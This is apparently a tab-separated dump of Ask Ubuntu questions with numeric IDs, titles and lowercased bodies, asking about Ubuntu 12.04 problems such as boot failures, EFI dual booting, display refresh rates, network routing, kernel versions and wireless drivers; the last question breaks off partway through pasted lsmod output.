193218	refresh rate revert on 60 hz on reboot	i just installed ubuntu 12.04 ( upgrade from 11.10 ) and when i change monitor refresh rate everything is ok , until reboot , on reboot my refresh rate revert to 60 hz . i found similar threads on ask ubuntu but answers are not good for me . is there any way for making a script which change refresh rate using nvidia settings , or can you help me to fix this using xrandr . refresh rate should be 85 and resolution 1280x960 . plz help .
193222	should security updates always be installed ?	we are a small shop , with no real sysadmin . so developers ( java ee ) also try to maintain ubuntu server 12.04 . when i login a terminal and i see messages like : 6 packages can be updated . 6 updates are security updates . should all security updates always be installed ? can some be ignored ? should these be acted upon immediately ? or one could wait for 2:00 a.m. on the coming sunday ? is there a way to know a `` critical '' update ? is there a good sysadmin for dummies resource i should be reading ?
193223	software to help filling out pdf that is not a form	i have one of those really annoying pdf 's that has spaces that when printed create a form to fill out by hand , but the author has not actually made it a `` pdf form '' . i was wondering if there was any package that would help me fill out the form anyway . i know that just about any pdf editor will allow me to type text onto a form , but i 'm looking for something that specifically will help me with the following two issues : aligning multiple form fields vertically ( left edge , e.g . ) helping me get all of the text to be the same distance from the `` line '' at the bottom of the form field . ( also , if you know of webapps that would help with this , i will accept those answers as well . )
193231	python access pidgin data structure by dbus	i recentely started to program in python and making a script/plugin for pidgin , i need to access purpleconversationuiops and use the has_focus field , based in some examples in documentation of pidgin i made this : # ! /usr/bin/env python import dbus , gobject from dbus.mainloop.glib import dbusgmainloop def view ( conv ) : if conv == 1 : # if has focus print `` has focus '' dbus.mainloop.glib.dbusgmainloop ( set_as_default=true ) bus = dbus.sessionbus ( ) bus.add_signal_receiver ( view , dbus_interface= '' im.pidgin.purple.purpleconversationuiops '' , signal_name= '' hasfocus '' ) loop = gobject.mainloop ( ) loop.run ( ) he gives no error but i do n't receive any signal , so how can i access the has_focus field ?
193234	failure to boot 12.04 on hp amd dual core . rescue mode does n't even come up	i have 12.04 installed on hp 64 bit dual core amd laptop.. worked great until about 1-2 months ago.. now takes 1/2 hour to 25 hours to boot if it ever does . a minor number of times i get the hp logo with hash lines on screen and it just hangs ... when it finally boots 95 % it will run until i turn it off days later to see if any of the upgrades fixed the problem . currently , if it boots , it is random.. .left on over night .. 2 nights ago and came back to a hp logo with hash lines horizontal across the screen.. frozen.. rebooted back to black screen.. no hp logo ... most often when it does boot.. no hp logo.. just cursor shows up.. and then i know it will finally load ... computer has been made worthless and it is my work computer..help please ... rescue mode ca n't be invoked.. computer doesnt respond.. has shown up 3 times in about 100 and when i have tried it ... 1 time it resulted in a boot up but then failed in a couple hours .
193235	ubuntu keeps randomly switching disks	it took me a while to notice , but here 's what happens . i have 2 disks on my computer . on startup , ubuntu 's disk utility tells me one is sda and the other sdb . on restart it switches them and on another restart , switches again . it 's impossible for me to set my /etc/fstab with the os randomly switching my disks . i am not changing any settings in bios . how can i make this stop ?
193239	ubuntu server 12.04 as a router . problem with dns ? ? or routing table ?	i have a virtualbox lab made up of 4 windows 2008 r2 servers ( dc/dns , sql , sharepoint , exchange ) that are configured with static ip addresses with nic 's attached to internal network . everything works . i had the requirement to execute some tests that also access external services available on the internet . to keep things clean and similar to the production environment i have installed another vm , with ubuntu server 12.04 64 bit and configured ( i hope ) to work as a router like described on this post . this vm has two network interfaces : first is bridged with the host and is used as a wan connection and the other one attached in the internal network with its own static ip address on the internal network subnet . but actually the windows servers does not connect to the internet while the unix one connects . i did a route command . this is the result : kernel ip routing table destination gateway genmask flags metric ref use iface default 10.69.121.1 0.0.0.0 ug 100 0 0 eth0 10.69.121.0 * 255.255.255.0 u 0 0 0 eth0 192.168.83.0 * 255.255.255.0 u 0 0 0 eth1 can somebody help me with this configuration ? : ) thanks ! addendum : i forgot to mention that one of the windows server hosts a dns service for which i should maybe configure a forwarding server but i do not exactly know which server to forward on ... : (
193241	is it possible to install ubuntu without formatting any partitions ?	can i install ubuntu without formatting any partitions on my hard drive ? i am already running windows 7 and i want to install ubuntu as well without formatting any of the partitions i have already created .
193248	google authenticator for desktop ( lightdm or gdm plugin )	there has a been a similar question , but that 's not exactly what i want . i 'd like to know if there is a plugin , or add-on , for lightdm or gdm that allows me to authenticate using my password and google authenticator . i 'm talking about entering your ga code into the desktop login -- both gui or command line , shell login -- in order to gain access to your local desktop .
193249	microphones not working with 12.04	installed ubuntu precise pangolin and everything is working fine except for my microphones ( both internal and external ) . i have updated the drivers and installed alsa , to no avail . what to do ?
193251	how to set all locale settings in ubuntu	a remote installed application has some encoding problems and on my local machine it is running fine . what is the best way to `` copy '' my locales to the remote machine ? the locales on my personal machine are configured like this : $ locale lang=de_de.utf-8 language=de_de : en lc_ctype= '' de_de.utf-8 '' lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_collate= '' de_de.utf-8 '' lc_monetary=en_us.utf-8 lc_messages= '' de_de.utf-8 '' lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 lc_all=
193258	unload kernel-module before boot	i compiled ndiswrapper from source . then installed a wireless windows driver . after that i loaded the ndiswrapper kernel-module with sudo modprobe ndiswrapper . now my system stops during boot . how can i unload the ndiswrapper kernel-module ?
193259	booting the livecd/usb in efi mode fails on samsung tablet xe700t1a	my tablet is samsung series 7 slate ( xe700t1a-a02fr ( french language ) ) . it operates an intel sandy bridge architecture . the main issue about this tablet is that it ships with an installed windows 7 in ( u ) efi mode ( gpt partition table , etc . ) , so i 'd like to get an efi dual boot with ubuntu . but it seems i ca n't boot on the livecd in efi mode . it starts loading ( up to initrd ) , but i then get a blank ( black ) screen . i 've tried the nomodeset kernel option ( as well as removing quiet and splash ) with no luck . [ 2012-09-27 ] i have used the ubuntu 12.04.1 desktop iso ( i have read somewhere that it is the only one that can boot in efi mode ) . i 'd say this has something to do with uefi since the livecd boots in bios mode but not in efi mode . besides , i am not sure my boot info will help , since i ca n't boot the livecd in efi mode . as a result i ca n't install ubuntu in efi mode . so it would be the boot info from the livecd boot in bios mode . this happens on a ubuntu-12.04.1-desktop-amd64 iso used on a liveusb . live usb was created by dd'ing the iso onto the full disk device ( i.e . /dev/sdx no number ) of the flash drive . i have also tried copying the livecd files on a primary gpt partition , but with no luck , i just get the grub shell , no menu , no install option . [ 2012-09-28 ] i tried today a flash drive created with ubuntu 's startup disk creator and the alternate 12.04.1 64 bit iso . i get a grub menu in text mode ( which meens it did start in efi mode ) with install options / test options . but when i start any of these , i simply get a black screen ( no cursor , neither mouse nor text-mode cursor ) . i tried removing the 'quiet ' option and adding nomodeset and acpi=off , but it did n't do any good . so this is the same result as for the livecd . [ 2012-10-01 ] i have tried with a version of the secure remix version via usb-creator-gtk . the boot on the usb key has the same symptoms . boot in efi mode is impossible ( i have menu but whatever entry i choose , i get the blank screen problem ) . the boot in bios mode works , i did the install . then i used boot-repair to try installing grub-efi and get a system that would boot in efi mode . but i ca n't boot this system , because the efi firmware does n't seem to detect that sda contains a valid efi partition . here is the resulting boot-info boot info 1253554 [ 2012-10-01 ] today , i have reinstalled the pre-shipped version of windows 7 , and then installed ubuntu from a secure-remix iso dumped on usb flash drive vie usb-creator-gtk booted in bios mode . when install ended , i said `` continue testing '' then i used boot-repair to try get the bootloader installed . now , when i boot the tablet , i get the grub menu , it can chainload windows 7 flawlessly . but when i try to start one of the ubuntu options i get the same old blank screen . here is the new boot-info : boot info 1253927 [ 2012-10-01 ] i tried installing the 3.3 kernel by chrooting a live usb boot ( secure remix again ) into the installed system . same symptoms . i feel the key to this is that the device 's efi firmware ( which is efi v2.0 ) would expose the graphics hardware in a way that prevents the kernel to initialize it , and thus prevents it from booting ( the kernel stops all drive access just after the screen turns kind of very dark purple ) . here is some info on the uefi firmware as given by refind : efi revision : 2.00 platform : x86_64 ( 64 bit ) firmware : american megatrends 4.635 screen output : graphics output ( uefi ) , 800x600 [ 2012-10-08 ] this week end i tried loading the kernel with elilo . eventhough i did n't have more luck on booting the kernel , elilo gives more info when loading the kernel . i think the next step is trying to load a kernel with efi stub directly .
193261	verbose booting of kernel	here i have the file : /etc/defaults/grub what do i need to put in that file to make the booting more verbose . i want to see all messages of the kernel while it is loading
193263	can i use iso image to install win 7 in virtualbox running on ubuntu 12.04 ?	attempting to install win 7 from iso image in virtualbox installed on ubuntu 12.0.4 lts . the image boots but fails to continue install . i 've tried 2 iso images with the same result . how should i change what i 'm doing for a successful install ?
193264	wifi connected but no data transfer : `` ping : sendmsg : no buffer space available ''	i have a desktop which runs on windows xp and a laptop which runs in ubuntu 12.04 . recently i have set up a wireless router in order to be able to access internet on my laptop through wifi . the laptop connects to the wifi at ease , but is unable to transfer any data . only when i switch on my laptop for the first time , it is able to transfer some data for just few minutes , after which it even fails to ping the router . ping to router shows : `` ping : sendmsg : no buffer space available '' , but the wifi still shows to be connected . please help !
193268	can not connect to internet ?	before i installed ubuntu 12.04 ( my problem was that i did n't install the gui version , which explains my first question ) , my internet provider shut off our connection for going over the bandwidth permitted . this was back around august 16 . it 's september , almost october . we 've paid our bill in the first week of september , so the bandwidth should be reset . yet for some reason , i ca n't connect at all . it basically gives me the same message saying that the conection could n't be made , which only shows up when a tower is down , or the data us all used . could it be because i had installed ubuntu between the time it quit working till now , and could installing ubuntu have made my desktop confused about whether or not the bill is paid ? this only happens in windows 7 , but i need to make sure its working so i can copy it over to ubuntu when i 'm certain it 'll connect . is there something i need to do , or should i contact my internet provider ( at & t ) to resolve this ?
193275	uninstalled nvidia driver now plymouth garbled	because of some graphical glitches i rolled back to the standard open source driver by uninstalling nvidia from system settings - > additional drivers . the open source driver is fine for my needs , but upon booting , plymouth is glitchy . it shows a full ubuntu sunrise splash animation fine when shutting down , so i assume it can , just not on start up . can this be fixed ? have i uninstalled & configured correctly ? would it help to just use onboard graphics ? : intel速 graphics media accelerator 950 pixel shader 2.0 , directx 9.0 max . shared memory 224mb i figure graphics card overkill for just desktop effects . i run cairo dock under gnome iii . cairo dock is bug free with open source drivers , that along with hi-definition splash is good .
193277	attempting to dual boot ubuntu and windows 7 on sony vaio with insyde h2o bios	my situation is the same that is addressed here sony vaio with insyde h2o efi bios will not boot into grub efi and here http : //www.hackourlife.com/sony-vaio-with-insyde-h2o-efi-bios-ubuntu-12-04-dual-boot i tried to install ubuntu 12.04 from the live cd alongside my current windows 7 . i have to switch my bios to legacy mode in order to boot from cd . if i were to do a normal installation and remain in legacy mode , the bios will display `` operating system not found '' . if i switch back then the bios just boots to windows . to solve the problem , i tried following the steps in the previous two articles . my drive is partitioned as : sda1 fat32 location of windows efi files ( flagged as boot in ubuntu install ) sda2 unknown sda3 nfts windows c : sda4 ext4 ubuntu root sda5 swap sda6 ext4 ubuntu home i was a little confused by the requirement in the second article to `` be careful to install grub bootloader in /dev/sda3 '' in my case , the relevant partition is sda1 . i have tried three things : setting the sda1 mount point as /boot , as /boot/efi , and as the special reserved grub partition . in each install i indicated that grub should be installed in sda1 . after each install i reboot to the live cd and look in the sda1 . i see efi/boot and efi/windows , but no efi/ubuntu and consequently no grubx64.efi . i understand the recommended procedure of moving grubx64.efi into the efi/boot directory and replacing the present bootx64.efi file , but i see no grubx64.efi and i do n't know where it should be .
193281	ccsm is not working in gnome and gnome classic	compiz config manager is not working in gnome and gnome classic and studio . first i install ubuntu studio , then gnome desktop and classic inside it . what to do ? is ubuntu studio not support ccsm ?
193285	can not resume from suspend	i have recently installed ubuntu 12.04 on a hp pavillion and whenever i enter suspend mode , my session is not resumed.all i get is a black screen.i have looked up other answers but they do n't work .
193286	how to add the new startup sound to ubuntu 12.04 ?	ubuntu 12.04 promised to add a brand new startup sound : http : //www.youtube.com/watch ? v=ngaj_gj-txa . but its not there in the final release . there 's no sound at all ! i now know how to restore the old sounds back thanks to this question : how to add the old startup sound ( not login sound ) ? but my question is , how to add the new ( or any other custom ) startup sound to ubuntu ?
193287	how can i install gephi ?	i 'm failing to install gephi properly on ubuntu 12.04 . i need to do some data analysis for a course using it .
193288	problems with upstart script in ~/.init	i 'm experimenting with running sonar on my linux desktop box . i wanted to make it start up automatically on startup of the box , but it 's ok for it to run as me . i created `` ~/.init/sonar.conf '' with the following simple contents : description `` sonar server '' start on startup respawn chdir ~/apps/sonar-3.2/bin exec ~/apps/sonar-3.2/bin/linux-x86-64/sonar.sh start i read that upstart is n't configured for user jobs by default , so i edited `` /etc/dbus-1/system.d/upstart.conf '' , commenting out the existing `` '' element and replacing it with the following : < policy context= '' default '' > < allow send_destination= '' com.ubuntu.upstart '' send_interface= '' org.freedesktop.dbus.introspectable '' / > < allow send_destination= '' com.ubuntu.upstart '' send_interface= '' org.freedesktop.dbus.properties '' / > < allow send_destination= '' com.ubuntu.upstart '' send_interface= '' com.ubuntu.upstart0_6 '' / > < allow send_destination= '' com.ubuntu.upstart '' send_interface= '' com.ubuntu.upstart0_6.job '' / > < allow send_destination= '' com.ubuntu.upstart '' send_interface= '' com.ubuntu.upstart0_6.instance '' / > < /policy > when i do `` start sonar '' i get `` start : job failed to start '' . i also did `` initctl list | grep sonar '' and got `` sonar stop/waiting '' . how can i troubleshoot this further ?
193290	laptop power button not working	i have a ( seemingly rather exotic ) dell latitude xt2 notebook running lubuntu 12.04 , fresh install . tried to get the power button to work as expected ( opening the logout dialog lubuntu-logout ) , but no success : power button does nothing but forced power-off on long press . the power button itself is detected and works . in xfce4-power-manager-settings , when i set the power button action from `` ask '' ( = open lubuntu-logout ) to `` shutdown '' , the laptop shuts down successfully ; pressing the power button is recognized and processed correctly . edit : i removed a bunch of info from the question , as it seems not to be related to the problem .
193299	link to directory in bash	i 'm using the ln command to create a symbolic link to a directory using bash , i went to the directory i wanted to make a link and used the following command : ln -s c # / ~/projetos this would create a link to ~/media/projects/c # in the ~/projetos folder . but once i cd to my home , the folder is displayed in red color and i ca n't access it , what 's happening here ?
193301	no bass on my laptop	a have a laptop ( acer ) with two front speakers and subwoffer ( acer tuba ) . after upgrading to 12.04 only front speakers are working , no sound from subwoffer . there is no 2.1 configuration on sound configuration panel , only 2.0 4.0 , 4.1 , 5.0 , 5.1 , but no matter what i choose a ca n't get sound from subwoofer . sound is very poor quality without bass speaker . sound card is realtek alc888 .
193306	chrome keeps crashing after updates	i 'm a chrome user and an enthusiast but few days ago i made ubuntu get some updates using update manager , then i turned off my notebook and when i restarted it , i tried to start chrome which after a few seconds turned the screen completely black , and some errors appeared for few seconds and then i got logged off , and had to re-login , and when i opened chrome again the same thing happened ! i 've uninstalled it with synaptic and did complete cleanings before re-installing chrome but nothing succeeded . now i ca n't use either chromium and chrome , but firefox works . it 's a very strange thing , never happened to me before and i do n't know what to do because i had all my bookmarks syncronized in chrome ! please help if you can : )
193307	routing 2 isps to 2 different networks	ok , so here is my scenario . eth0 and eth3 point to 2 different isps , eth1 is an internal network say on 192.1.1.0 and eth2 is on another network say 10.1.1.0 . i want each network to be on their own internet connection . i 'm using iptables to route eth1 to eth0 and eth2 to eth3 so each network has a physical connection to their own internet . the problem is routing . i ca n't assign 2 default gateways.. one to eth0 and one to eth3 . right now i only have a default gateway on eth0 . my 192.1.1.0 network has internet access , eth1 talks to eth0 which has a default gateway to the internet . my 10.1.1.0 network does not have internet , eth2 is either talking to eth3 which has no default gateway or eth2 is trying to talk to eth0 which is forbidden by my iptables . how can i go about adding 2 default gateways or go about solving this problem ?
193308	is my kernel version ok or i have to update it ?	i 'm using ubuntu precise : $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' but my kernel version is : $ uname -r 3.0.0-12-generic is this configuration fine or i have to update my kernel to newer version ? if yes , how can i do that ? apt-cache search linux-image-3 returns linux-image-3.2.0-23-generic - linux kernel image for version 3.2.0 on 64 bit x86 smp linux-image-3.2.0-23-virtual - linux kernel image for version 3.2.0 on 64 bit x86 virtual guests linux-image-3.2.0-23-generic-pae - linux kernel image for version 3.2.0 on 64 bit x86 smp linux-image-3.2.0-23-lowlatency - linux kernel image for version 3.2.0 on x86/x86_64 linux-image-3.2.0-23-lowlatency-pae - linux kernel image for version 3.2.0 on x86 linux-image-3.2.0-24-generic - linux kernel image for version 3.2.0 on 64 bit x86 smp linux-image-3.2.0-24-virtual - linux kernel image for version 3.2.0 on 64 bit x86 virtual guests linux-image-3.2.0-24-generic-pae - linux kernel image for version 3.2.0 on 64 bit x86 smp linux-image-3.2.0-25-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-25-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-25-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.2.0-26-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-26-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-26-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.2.0-27-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-27-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-27-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.2.0-29-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-29-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-29-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.2.0-30-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-30-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-30-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.2.0-31-generic - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-31-generic-pae - linux kernel image for version 3.2.0 on 32 bit x86 smp linux-image-3.2.0-31-virtual - linux kernel image for version 3.2.0 on 32 bit x86 virtual guests linux-image-3.5.0-15-generic - linux kernel image for version 3.5.0 on 32 bit x86 smp linux-image-3.5.0-13-generic - linux kernel image for version 3.5.0 on 32 bit x86 smp linux-image-3.0.0-12-generic - linux kernel image for version 3.0.0 on x86/x86_64 the cat /etc/apt/sources.list command returns ( i removed commented lines ) deb http : //fr.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise main restricted deb http : //fr.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb http : //fr.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise universe deb http : //fr.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise-updates universe deb http : //fr.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse deb http : //extras.ubuntu.com/ubuntu precise main # third party developers repository and dpkg -l | grep `` linux\- [ a-z ] *\- '' returns ii linux-headers-2.6.38-10 2.6.38-10.46 header files related to linux kernel version 2.6.38 ii linux-headers-2.6.38-10-generic 2.6.38-10.46 linux kernel headers for version 2.6.38 on x86/x86_64 ii linux-headers-2.6.38-11 2.6.38-11.50 header files related to linux kernel version 2.6.38 ii linux-headers-2.6.38-11-generic 2.6.38-11.50 linux kernel headers for version 2.6.38 on x86/x86_64 ii linux-headers-3.0.0-12 3.0.0-12.20 header files related to linux kernel version 3.0.0 ii linux-headers-3.0.0-12-generic 3.0.0-12.20 linux kernel headers for version 3.0.0 on x86/x86_64 ii linux-headers-3.2.0-24 3.2.0-24.39 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-24-generic 3.2.0-24.39 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-24-generic-pae 3.2.0-24.39 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-25 3.2.0-25.40 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-25-generic 3.2.0-25.40 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-25-generic-pae 3.2.0-25.40 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-26 3.2.0-26.41 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-26-generic 3.2.0-26.41 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-26-generic-pae 3.2.0-26.41 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-27 3.2.0-27.43 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-27-generic 3.2.0-27.43 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-27-generic-pae 3.2.0-27.43 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-29 3.2.0-29.46 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-29-generic 3.2.0-29.46 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-29-generic-pae 3.2.0-29.46 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-30 3.2.0-30.48 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-30-generic 3.2.0-30.48 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.2.0-30-generic-pae 3.2.0-30.48 linux kernel headers for version 3.2.0 on 32 bit x86 smp ii linux-headers-3.5.0-13 3.5.0-13.13 header files related to linux kernel version 3.5.0 ii linux-headers-3.5.0-13-generic 3.5.0-13.13 linux kernel headers for version 3.5.0 on 32 bit x86 smp ii linux-headers-3.5.0-15 3.5.0-15.22 header files related to linux kernel version 3.5.0 ii linux-headers-3.5.0-15-generic 3.5.0-15.22 linux kernel headers for version 3.5.0 on 32 bit x86 smp ii linux-headers-generic 3.5.0.15.15 generic linux kernel headers ii linux-headers-generic-pae 3.5.0.15.15 transitional package rc linux-image-2.6.28-11-generic 2.6.28-11.42 linux kernel image for version 2.6.28 on x86/x86_64 rc linux-image-2.6.28-15-generic 2.6.28-15.52 linux kernel image for version 2.6.28 on x86/x86_64 ii linux-image-2.6.28-16-generic 2.6.28-16.55 linux kernel image for version 2.6.28 on x86/x86_64 rc linux-image-2.6.31-14-generic 2.6.31-14.48 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-15-generic 2.6.31-15.50 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-16-generic 2.6.31-16.53 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-17-generic 2.6.31-17.54 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-19-generic 2.6.31-19.56 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-20-generic 2.6.31-20.58 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.31-21-generic 2.6.31-21.59 linux kernel image for version 2.6.31 on x86/x86_64 rc linux-image-2.6.32-21-generic 2.6.32-21.32 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-22-generic 2.6.32-22.36 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-23-generic 2.6.32-23.37 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-24-generic 2.6.32-24.43 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-25-generic 2.6.32-25.45 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-26-generic 2.6.32-26.48 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-27-generic 2.6.32-27.49 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-28-generic 2.6.32-28.55 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-29-generic 2.6.32-29.58 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.32-30-generic 2.6.32-30.59 linux kernel image for version 2.6.32 on x86/x86_64 ii linux-image-2.6.32-31-generic 2.6.32-31.61 linux kernel image for version 2.6.32 on x86/x86_64 rc linux-image-2.6.35-28-generic 2.6.35-28.50 linux kernel image for version 2.6.35 on x86/x86_64 ii linux-image-2.6.38-10-generic 2.6.38-10.46 linux kernel image for version 2.6.38 on x86/x86_64 ii linux-image-2.6.38-11-generic 2.6.38-11.50 linux kernel image for version 2.6.38 on x86/x86_64 ii linux-image-2.6.38-8-generic 2.6.38-8.42 linux kernel image for version 2.6.38 on x86/x86_64 ii linux-image-3.0.0-12-generic 3.0.0-12.20 linux kernel image for version 3.0.0 on x86/x86_64 rc linux-image-3.0.0-13-generic 3.0.0-13.22 linux kernel image for version 3.0.0 on x86/x86_64 rc linux-image-3.0.0-14-generic 3.0.0-14.23 linux kernel image for version 3.0.0 on x86/x86_64 rc linux-image-3.0.0-15-generic 3.0.0-15.26 linux kernel image for version 3.0.0 on x86/x86_64 rc linux-image-3.0.0-16-generic 3.0.0-16.29 linux kernel image for version 3.0.0 on x86/x86_64 rc linux-image-3.0.0-17-generic 3.0.0-17.30 linux kernel image for version 3.0.0 on x86/x86_64 ii linux-image-3.2.0-24-generic 3.2.0-24.39 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-25-generic 3.2.0-25.40 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-26-generic 3.2.0-26.41 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-27-generic 3.2.0-27.43 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.2.0-30-generic 3.2.0-30.48 linux kernel image for version 3.2.0 on 32 bit x86 smp ii linux-image-3.5.0-13-generic 3.5.0-13.13 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-15-generic 3.5.0-15.22 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-13-generic 3.5.0-13.13 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-15-generic 3.5.0-15.22 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-generic 3.5.0.15.15 generic linux kernel image ii linux-libc-dev 3.5.0-15.22 linux kernel headers for development rc linux-restricted-modules-2.6.28-11-generic 2.6.28-11.15 non-free linux kernel modules for version 2.6.28 on x86/x86_64 rc linux-restricted-modules-2.6.28-15-generic 2.6.28-15.20 non-free linux kernel modules for version 2.6.28 on x86/x86_64 rc linux-restricted-modules-2.6.28-16-generic 2.6.28-16.21 non-free linux kernel modules for version 2.6.28 on x86/x86_64 ii linux-sound-base 1.0.25+dfsg-0ubuntu1 base package for alsa and oss sound systems
193313	i want to be asked for password for mounting drives	in earlier ubuntu releases ( as far as i remember natty had it ) we were asked for password while trying to mount the drive using nautilus . but in ubuntu 12.04 ( also in 11.10 ) it is removed . but i want to re-enable that feature . question is : how can i re-enable that feature i.e being asked for mounting drive ?
193319	missing driver asus pce-n53 11n n600 pci-e adapter	i have problems with getting an asus pce-n53 11n n600 pci-e adapter card to work on my desktop computer . as far as i can tell no drivers are installed for the card . i know i can manually download the drivers directly from asus , but i would rather not go that route . if there are anyone that knows about any packages or other things i can do to make this work would be much appreciated . some systems details : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : d4:3d:7e:03 : b9:1d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.0.173 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7100000-f710ffff $ lsmod module size used by nvidia 12319264 51 vesafb 13844 1 snd_hda_codec_hdmi 32474 1 joydev 17693 0 bnep 18281 2 rfcomm 47604 0 bluetooth 180104 10 bnep , rfcomm snd_hda_codec_realtek 224173 1 snd_seq_midi 13324 0 ppdev 17113 0 snd_rawmidi 30748 1 snd_seq_midi usbhid 47199 0 hid 99559 1 usbhid nouveau 774641 0 parport_pc 32866 1 snd_hda_intel 33773 5 ttm 76949 1 nouveau snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel drm_kms_helper 46978 1 nouveau drm 242038 3 nouveau , ttm , 